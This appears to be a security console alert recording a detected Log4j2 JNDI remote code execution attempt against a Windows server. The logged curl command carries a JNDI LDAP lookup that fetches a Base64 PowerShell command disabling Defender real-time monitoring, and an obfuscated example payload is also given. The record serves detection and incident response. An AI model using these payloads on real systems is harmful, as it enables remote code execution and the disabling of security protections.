Apache Log4j2 (JNDI) Remote Code Execution 3
Details
This alert title has been seen 1 times in the last 7 days across Smiths Cogwheels, Inc.
Status:
Status Reason:
None
First Activity:
2024/02/18 12:49:23 UTC (a month ago)
Last Activity:
2024/02/18 12:57:11 UTC (a month ago)
Inserted At:
2024/02/18 12:57:04 UTC (a month ago)
Severity:
High (0.75)
Threat Score:
7.5
Tenant:
Detector:
Taegis Watchlist
Tactics:
Initial Access
Techniques:
Sensor Types:
Red Cloak
Confidence:
66%
Username:
Hostname:
Agent/Sensor ID:
Files:
MD5:
SHA1:
Investigations:
This alert has not been added to an investigation.
Occurrence Count:
2
Grouped by (Group Key):
96072:app:event-filter:process:f92ae32a-76c1-47d0-a0f6-5507f3270337:b09b0d11ea98b188bdd2ddc897a73b60:C:\curl\curl.exe:2024-02-14
Affected Agents (1)
Last Updated:
2024/03/31 13:21:57 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
VERSION_SERVER_2016
Most Recent Address:
10.24.22.50
Open alerts (0) for Related Entities
Open alerts within past 72 hours from alert creation
NO DATA
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
0
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0
Closed alerts (69) for Related Entities
Closed alerts within past 30 days from alert creation
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
69
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0
Open or closed investigations (0) for Related Entities
Open or closed investigations within past 30 days
File Hashes (16fae319be8f1e29b2be6fcd5aad9dc2 +1 more)
0
Files (curl.exe +1 more)
0
Host (b09b0d11ea98b188bdd2ddc897a73b60)
0
User (WINSERV-DB\Administrator)
0
A process event with a command line that features a syntax for a Java Naming and Directory Interface (JNDI) lookup function was identified. This activity may indicate that a threat actor is attempting to execute code associated with a known remote code execution (RCE) vulnerability, CVE-2021-44228.
Example:
> curl -H X-Api-Version: ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
JNDI allows software clients to discover and look up data and objects by name. A threat actor can host such objects in various naming or directory services, such as Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP), or the Domain Name System (DNS). An attacker who can control log messages or log message parameters can exploit CVE-2021-44228 to execute arbitrary code loaded from a server they control (e.g., an LDAP server) when message lookup substitution is enabled.
External References
Log4j vulnerability CVE-2021-44228 under active exploitation
GitHub | tangxiaofeng7 / CVE-2021-44228-Apache-Log4j-Rce
First Event Details
Process
Command Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Event Time:
2024/02/18 12:49:23 UTC · a month ago
Ingest Time:
2024/02/18 12:56:55 UTC · a month ago
Process ID:
1856
Image Path:
C:\curl\curl.exe (Admin)
Parent Process ID:
640
Parent Image Path:
C:\Windows\System32\cmd.exe
Username:
WINSERV-DB\Administrator (Admin)
Hostname:
Sensor ID:
b09b0d11ea98b188bdd2ddc897a73b60
Related File Data
File Name:
curl.exe
2024/02/18 12:49:23 UTC - Source Event
Command Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:56:55 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1856
Process Create Time:
2024/02/18 12:49:23 UTC (a month ago)
2024/02/18 12:53:01 UTC
Command Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:57:11 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1928
Process Create Time:
2024/02/18 12:53:01 UTC (a month ago)